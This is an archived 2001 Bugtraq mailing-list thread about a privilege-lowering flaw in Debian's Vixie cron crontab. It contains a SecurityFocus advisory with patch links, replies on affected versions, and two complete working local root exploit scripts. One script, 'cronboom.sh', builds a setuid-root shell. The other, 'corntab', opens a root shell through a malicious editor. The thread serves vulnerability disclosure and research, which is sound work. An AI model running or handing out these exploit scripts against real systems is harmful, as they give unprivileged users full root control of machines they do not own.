6468468 2001-05-07 16:08 -0600 /17 rader/ Cade Cairns <cairnsc@SECURITYFOCUS.COM> Sänt av: joel@lysator.liu.se Importerad: 2001-05-08 17:38 av Brevbäraren Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM Externa svar till: cairnsc@SECURITYFOCUS.COM Mottagare: Bugtraq (import) <16915> Ärende: Vixie cron vulnerability ------------------------------------------------------------ Greetings Bugtraqers, Attached is a simple proof of concept for the vixie cron vulnerability recently published in Debian Security Advisory DSA-054-1. The code was written during SIA analysis of this vulnerability. Further information on the vulnerability may be found in the SecurityFocus SIA commercial alert, also attached to this message. Cade Cairns SecurityFocus http://www.securityfocus.com/ (6468468) /Cade Cairns <cairnsc@SECURITYFOCUS.COM>/(Ombruten) Bilaga (text/plain) i text 6468469 Bilaga (text/plain) i text 6468470 Kommentar i text 6469468 av Edwin Chiu <Edwin.Chiu@E-WARES.COM> Kommentar i text 6469755 av Michal Zalewski <lcamtuf@COREDUMP.CX> 6468469 2001-05-07 16:08 -0600 /83 rader/ Cade Cairns <cairnsc@SECURITYFOCUS.COM> Bilagans filnamn: "cronboom.sh" Importerad: 2001-05-08 17:38 av Brevbäraren Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM Externa svar till: cairnsc@SECURITYFOCUS.COM Mottagare: Bugtraq (import) <16916> Bilaga (text/plain) till text 6468468 Ärende: Bilaga (cronboom.sh) till: Vixie cron vulnerability ------------------------------------------------------------ #!/bin/sh # # cronboom - simple proof-of-concept exploit for vixie cron version 3.1pl1 # # synopsis: # the crontab file maintenance program (crontab) fails to drop privileges # before invoking the editor under certain circumstances. # # description: # a serialization error exists in some versions of the file maintenance # program, crontab. the vulnerability was introduced in versions which # were patched for seperate vulnerability in fall of 2000 (see Bugtraq # ID #1960). # # when a parsing error occurs after a modification operation, crontab will # fail to drop privileges correctly for subsequent modification operations. # because the program is installed setuid root, it may be possible for a # local user to gain root privileges. # # affected versions: # cron_3.0pl1-57.2 distributed with Debian Linux 2.2. # # note that copies of the program with the patch mentioned above are likely # to also be vulnerable. # # references: # http://www.securityfocus.com/bid/2687 # # 05/07/01 cairnsc@securityfocus.com CRONTAB=/usr/bin/crontab if ! test -x $CRONTAB; then echo "** unable to locate crontab executable, exiting" exit 1 fi cat > vcsh.c << EOF #include <unistd.h> int main() { setuid(0); setgid(0); execl("/bin/sh", "sh", NULL); } EOF echo "** compiling shell wrapper as $PWD/vcsh" cc -o $PWD/vcsh $PWD/vcsh.c if ! test -x $PWD/vcsh; then echo "** compilation failed, exiting" exit 1 fi echo "** creating simple exploit script as $PWD/vcex.sh" cat > vcex.sh << EOF #!/bin/sh sleep 1 && echo "foo" >> \$1 if test -f $PWD/vcboom; then chown root.root $PWD/vcsh chmod 4755 $PWD/vcsh rm $PWD/vcboom else touch $PWD/vcboom fi EOF chmod 0755 $PWD/vcex.sh echo "** running $CRONTAB -e" echo "**" echo "** enter 'yes' at the first prompt, then enter 'no' at the second" echo (EDITOR=$PWD/vcex.sh $CRONTAB -e) echo echo "** done, the shell wrapper should be suid root" exit 0 (6468469) /Cade Cairns <cairnsc@SECURITYFOCUS.COM>/(Ombruten) 6468470 2001-05-07 16:08 -0600 /250 rader/ Cade Cairns <cairnsc@SECURITYFOCUS.COM> Bilagans filnamn: "SIA-2687.txt" Importerad: 2001-05-08 17:38 av Brevbäraren Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM Externa svar till: cairnsc@SECURITYFOCUS.COM Mottagare: Bugtraq (import) <16917> Bilaga (text/plain) till text 6468468 Ärende: Bilaga (SIA-2687.txt) till: Vixie cron vulnerability ------------------------------------------------------------ Thank you for using SecurityFocus.com's Security Intelligence Alert (SIA) Service. To manage account please visit https://alerts.securityfocus.com/ For questions or comments email us at alerts@securityfocus.com. --------------------------------------------------------------------------- Security Alert Subject: Vixie Cron crontab Privilege Lowering Failure Vulnerability BUGTRAQ ID: 2687 CVE ID: CVE-MAP-NOMATCH Published: May 07, 2001 Updated: May 07, 2001 Remote: No Local: Yes Availability: User Initiated Authentication: Not Required Credibility: Vendor Confirmed Ease: Exploit Available Class: Serialization Error Impact: 10.00 Severity: 6.90 Urgency: 7.59 Last Change: Initial analysis. --------------------------------------------------------------------------- Vulnerable Systems: Paul Vixie Vixie Cron 3.0pl1 + Debian Linux 2.2 sparc + Debian Linux 2.2 powerpc + Debian Linux 2.2 arm + Debian Linux 2.2 alpha + Debian Linux 2.2 68k + Debian Linux 2.2 Non-Vulnerable Systems: Summary: Local users can cause Vixie crontab to fail to drop privileges when editing files. Can lead to full system compromise. Impact: Local users can manipulate crontab's lowering of privileges, leading to full system compromise. Technical Description: Vixie cron is an implementation of the popular UNIX program that runs user-specified programs at periodic scheduled times. A serialization error exists in some versions of the crontab file maintenance program. The vulnerability was introduced in versions which were patched for seperate vulnerability in fall of 2000 (see Bugtraq ID #1960). When a parsing error occurs after a modification operation, crontab will fail to drop privileges correctly for subsequent modification operations. Because the program is installed setuid root, it may be possible for a local user to gain root privileges. Attack Scenarios: An attacker with local access must edit their crontab file and enter a line that causes the parser to fail. The attacker must then enter 'yes' when prompted as to whether he or she wishes to attempt to fix the error in the file. This will cause the editor to be invoked again, but with full privileges. The attacker could then execute arbitrary commands from the editor, or overwrite otherwise protected system files. Exploits: During SIA analysis of this vulnerability, Cade Cairns <cairnsc@securityfocus.com> wrote proof-of-concept exploit code. http://www.securityfocus.com/data/vulnerabilities/exploits/cronboom.sh Mitigating Strategies: Restricting local access to the host may prevent unauthorized users from exploiting this vulnerability. Restrict access to the cron faciliy to trusted users via the /etc/cron.allow and /etc/cron.deny files (man crontab). Solutions: For Paul Vixie Vixie Cron 3.0pl1: Debian upgrade 2.2 alpha cron_3.0pl1-57.3_alpha.deb http://security.debian.org/dists/stable/updates/main/binary-alpha/cro n_3.0pl1-57.3_alpha.deb Debian upgrade 2.2 arm cron_3.0pl1-57.3_arm.deb http://security.debian.org/dists/stable/updates/main/binary-arm/cron_ 3.0pl1-57.3_arm.deb Debian upgrade 2.2 i386 cron_3.0pl1-57.3_i386.deb http://security.debian.org/dists/stable/updates/main/binary-i386/cron _3.0pl1-57.3_i386.deb Debian upgrade 2.2 m68k cron_3.0pl1-57.3_m68k.deb http://security.debian.org/dists/stable/updates/main/binary-m68k/cron _3.0pl1-57.3_m68k.deb Debian upgrade 2.2 ppc cron_3.0pl1-57.3_powerpc.deb http://security.debian.org/dists/stable/updates/main/binary-powerpc/c ron_3.0pl1-57.3_powerpc.deb Debian upgrade 2.2 sparc cron_3.0pl1-57.3_sparc.deb http://security.debian.org/dists/stable/updates/main/binary-sparc/cro n_3.0pl1-57.3_sparc.deb Credit: Posted to Bugtraq in a Debian Security Advisory (DSA-054-1) on May 7, 2001. References: advisory: Debian DSA-054-1: cron http://www.securityfocus.com/advisories/3282 ChangeLog: May 07, 2001: Initial analysis. --------------------------------------------------------------------------- HOW TO INTERPRET THIS ALERT BUGTRAQ ID: This is a unique identifier assigned to the vulnerability by SecurityFocus.com. CVE ID: This is a unique identifier assigned to the vulnerability by the CVE. Published: The date the vulnerability was first made public. Updated: The date the information was last updated. Remote: Whether this is a remotely exploitable vulnerability. Local: Whether this is a locally exploitable vulnerability. Credibility: Describes how credible the information about the vulnerability is. Possible values are: Conflicting Reports: The are multiple conflicting about the existance of the vulnerability. Single Source: There is a single non-reliable source reporting the existence of the vulnerability. Reliable Source: There is a single reliable source reporting the existence of the vulnerability. Conflicting Details: There is consensus on the existence of the vulnerability but not it's details. Multiple Sources: There is consensus on the existence and details of the vulnerability. Vendor Confirmed: The vendor has confirmed the vulnerability. Class: The class of vulnerability. Possible values are: Boundary Condition Error, Access Validation Error, Origin Validation Error, Input Valiadtion Error, Failure to Handle Exceptional Conditions, Race Condition Error, Serialization Error, Atomicity Error, Environment Error, and Configuration Error. Ease: Rates how easiliy the vulnerability can be exploited. Possible values are: No Exploit Available, Exploit Available, and No Exploit Required. Impact: Rates the impact of the vulnerability. It's range is 1 through 10. Severity: Rates the severity of the vulnerability. It's range is 1 through 10. It's computed from the impact rating and remote flag. Remote vulnerabiliteis with a high impact rating receive a high severity rating. Local vulnerabilities with a low impact rating receive a low severity rating. Urgency: Rates how quickly you should take action to fix or mitigate the vulnerability. It's range is 1 through 10. It's computed from the severity rating, the ease rating, and the credibility rating. High severity vulnerabilities with a high ease rating, and a high confidence rating have a higher urgency rating. Low severity vulnerabilities with a low ease rating, and a low confidence rating have a lower urgency rating. Last Change: The last change made to the vulnerability information. Vulnerable Systems: The list of vulnerable systems. A '+' preceding a system name indicates that one of the system components is vulnerable vulnerable. For example, Windows 98 ships with Internet Explorer. So if a vulnerability is found in IE you may see something like: Microsoft Internet Explorer + Microsoft Windows 98 Non-Vulnerable Systems: The list of non-vulnerable systems. Summary: A concise summary of the vulnerability. Impact: The impact of the vulnerability. Technical Description: The in-depth description of the vulnerability. Attack Scenarios: Ways an attacker may make use of the vulnerability. Exploits: Exploit intructions or programs. Mitigating Strategies: Ways to mitigate the vulnerability. Solutions: Solutions to the vulnerability. Credit: Information about who disclosed the vulnerability. References: Sources of information on the vulnerability. Related Resources: Resources that might be of additional value. ChangeLog: History of changes to the vulnerability record. --------------------------------------------------------------------------- Copyright 2001 SecurityFocus.com Thank you for using SecurityFocus.com's Security Intelligence Alert (SIA) Service. To manage your account please visit https://alerts.securityfocus.com/ For questions or comments email us at alerts@securityfocus.com. (6468470) /Cade Cairns <cairnsc@SECURITYFOCUS.COM>/(Ombruten) 6469468 2001-05-08 13:44 -0400 /34 rader/ Edwin Chiu <Edwin.Chiu@E-WARES.COM> Sänt av: joel@lysator.liu.se Importerad: 2001-05-08 22:45 av Brevbäraren Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM Externa svar till: Edwin.Chiu@E-WARES.COM Mottagare: Bugtraq (import) <16922> Kommentar till text 6468468 av Cade Cairns <cairnsc@SECURITYFOCUS.COM> Ärende: Re: Vixie cron vulnerability ------------------------------------------------------------ From: Edwin Chiu <Edwin.Chiu@E-WARES.COM> To: BUGTRAQ@SECURITYFOCUS.COM Message-ID: <3AF83087.B0D2765@e-wares.com> FYI The exploit failed for: Redhat 6.1 vixie-cron-3.0.1-39 Redhat 6.2 vixie-cron-3.0.1-40 Regards, Edwin Cade Cairns wrote: > Greetings Bugtraqers, > > Attached is a simple proof of concept for the vixie cron vulnerability > recently published in Debian Security Advisory DSA-054-1. The code was > written during SIA analysis of this vulnerability. > > Further information on the vulnerability may be found in the SecurityFocus > SIA commercial alert, also attached to this message. > > Cade Cairns > SecurityFocus > http://www.securityfocus.com/ (6469468) /Edwin Chiu <Edwin.Chiu@E-WARES.COM>/----- Kommentar i text 6469713 av Jay D. Dyson <jdyson@TREACHERY.NET> 6469713 2001-05-08 14:01 -0700 /39 rader/ Jay D. Dyson <jdyson@TREACHERY.NET> Sänt av: joel@lysator.liu.se Importerad: 2001-05-09 00:05 av Brevbäraren Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM Externa svar till: jdyson@treachery.net Mottagare: Bugtraq (import) <16923> Kommentar till text 6469468 av Edwin Chiu <Edwin.Chiu@E-WARES.COM> Ärende: Re: Vixie cron vulnerability ------------------------------------------------------------ From: "Jay D. Dyson" <jdyson@TREACHERY.NET> To: BUGTRAQ@SECURITYFOCUS.COM Message-ID: <Pine.GSO.3.96.1010508135756.3740B-100000@crypto> -----BEGIN PGP SIGNED MESSAGE----- On Tue, 8 May 2001, Edwin Chiu wrote: > The exploit failed for: > Redhat 6.1 > vixie-cron-3.0.1-39 > Redhat 6.2 > vixie-cron-3.0.1-40 *nod* I wrote to Cade directly regarding the advisory as it seems to me that the issue is more a matter of Debian's implementation of Vixie cron than an issue with Vixie cron itself. I'm still futzing with it to see if any other implementations will squeal. Fun and interesting results will be posted when found. ;) - -Jay ( ( _______ )) )) .- "There's always time for a good cup of coffee" -. >====<--. C|~~|C|~~| (>------ Jay D. Dyson -- jdyson@treachery.net ------<) | = |-' `--' `--' `---------- "Si vis pacem, para bellum." ----------' `------' -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: See http://www.treachery.net/~jdyson/ for current keys. iQCVAwUBOvhQldCClfiU/BIVAQECcgP/fnDkOGxVAm6S+UKnCS5Kmdjnl67nVYGf IFaWyv9JKF82A7E7L0PBI9hTe27YvyhamFDBVIDAu79n1AszxXUt7g+F0WEuHtpy gBegB1+KnJCq8vzzdB9kBmCAe+XeILaG49BvACOcvww2AJN0YZhHu3ZA5COtWwhF QxBGcf+6MFw= =pGCW -----END PGP SIGNATURE----- (6469713) /Jay D. Dyson <jdyson@TREACHERY.NET>/(Ombruten) 6469755 2001-05-08 11:30 -0400 /18 rader/ Michal Zalewski <lcamtuf@COREDUMP.CX> Sänt av: joel@lysator.liu.se Importerad: 2001-05-09 00:24 av Brevbäraren Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM Externa svar till: lcamtuf@COREDUMP.CX Mottagare: Bugtraq (import) <16924> Kommentar till text 6468468 av Cade Cairns <cairnsc@SECURITYFOCUS.COM> Ärende: Re: Vixie cron vulnerability ------------------------------------------------------------ On Mon, 7 May 2001, Cade Cairns wrote: > Attached is a simple proof of concept for the vixie cron vulnerability > recently published in Debian Security Advisory DSA-054-1. The code was > written during SIA analysis of this vulnerability. Hm, there is my original proof-of-concept I coded for Sebastian Krahmer (who discovered this vulnerability), while working on it. This vulnerability affects Debian, SuSE, and probably few other Linuxes as well. It is a perfect example of bad coding, and how improper fixing of bugs might lead to even more dangerous conditions. It is fully automated, and I believe it gives absolutely nothing to the attacker, as this vulnerability can be exploited by hand in approximately 5 seconds ;) Michal Zalewski http://lcamtuf.coredump.cx (6469755) /Michal Zalewski <lcamtuf@COREDUMP.CX>/(Ombruten) Bilaga (text/plain) i text 6469756 6469756 2001-05-08 11:30 -0400 /88 rader/ Michal Zalewski <lcamtuf@COREDUMP.CX> Bilagans filnamn: "corntab" Importerad: 2001-05-09 00:24 av Brevbäraren Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM Externa svar till: lcamtuf@COREDUMP.CX Mottagare: Bugtraq (import) <16925> Bilaga (text/plain) till text 6469755 Ärende: Bilaga (corntab) till: Re: Vixie cron vulnerability ------------------------------------------------------------ #!/bin/bash clear echo ".-----------------------------------------------------------." echo "| Marchew.Hyperreal presents: vixie crontab exploit #728371 |" echo "|===========================================================|" echo "| Sebastian Krahmer <krahmer@security.is> |" echo "| Michal Zalewski <lcamtuf@coredump.cx> |" echo "\`-----------------------------------------------------------'" echo test "$CRONBIN" = "" && CRONBIN=/usr/bin/crontab echo ">>> Using binary: $CRONBIN" echo -n ">>> Setuid check: " if [ -u $CRONBIN ]; then echo "PASSED" else echo "FAILED" echo exit 1 fi echo -n ">>> Version check: " QQ=`strings $CRONBIN | grep '43 vixie Exp'` if [ "$QQ" = "" ]; then echo "FAILED" echo exit 1 else echo "PASSED" fi echo ">>> Building exploit..." cat >edit0r.c <<_eof_ #include <stdio.h> int main(int argc,char* argv[]) { sleep(1); if (geteuid()) { FILE* x=fopen(argv[1],"w"); fprintf(x,"blah blah blah\n"); fclose(x); } else { dup2(1,0); dup2(1,2); printf("\n>>> Entering rootshell, babe...\n"); system("touch $HOME/.xploited"); system("bash"); } } _eof_ gcc edit0r.c -o edit0r &>/dev/null rm -f edit0r.c if [ ! -f edit0r ]; then echo ">>> Cannot compile exploit." echo exit 1 fi rm -f ~/.xploited echo ">>> Performing attack..." ( echo "y"; echo "n" ) | VISUAL=$PWD/edit0r $CRONBIN -e 2>/dev/null rm -f edit0r if [ -f ~/.xploited ]; then echo echo ">>> Thank you." rm -f ~/.xploited echo exit 0 else echo echo ">>> Apparently I am not able to exploit it, sorry..." echo exit 1 fi (6469756) /Michal Zalewski <lcamtuf@COREDUMP.CX>/---